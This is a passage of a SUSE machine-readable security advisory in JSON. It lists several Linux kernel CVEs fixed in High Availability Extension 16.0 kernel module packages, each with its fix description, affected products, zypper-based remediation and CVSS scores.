"text": "https://www.suse.com/security/cve/CVE-2025-68741"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix improper freeing of purex item\n\nIn qla2xxx_process_purls_iocb(), an item is allocated via\nqla27xx_copy_multiple_pkt(), which internally calls\nqla24xx_alloc_purex_item().\n\nThe qla24xx_alloc_purex_item() function may return a pre-allocated item\nfrom a per-adapter pool for small allocations, instead of dynamically\nallocating memory with kzalloc().\n\nAn error handling path in qla2xxx_process_purls_iocb() incorrectly uses\nkfree() to release the item. If the item was from the pre-allocated\npool, calling kfree() on it is a bug that can lead to memory corruption.\n\nFix this by using the correct deallocation function,\nqla24xx_free_purex_item(), which properly handles both dynamically\nallocated and pre-allocated items.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68741",
"url": "https://www.suse.com/security/cve/CVE-2025-68741"
},
{
"category": "external",
"summary": "SUSE Bug 1255703 for CVE-2025-68741",
"url": "https://bugzilla.suse.com/1255703"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68741"
},
{
"cve": "CVE-2025-68743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix create memory region overlap check\n\nThe current check is incorrect; it only checks if the beginning or end\nof a region is within an existing region. This doesn\u0027t account for\nuserspace specifying a region that begins before and ends after an\nexisting region.\n\nChange the logic to a range intersection check against gfns and uaddrs\nfor each region.\n\nRemove mshv_partition_region_by_uaddr() as it is no longer used.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68743",
"url": "https://www.suse.com/security/cve/CVE-2025-68743"
},
{
"category": "external",
"summary": "SUSE Bug 1255708 for CVE-2025-68743",
"url": "https://bugzilla.suse.com/1255708"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68743"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
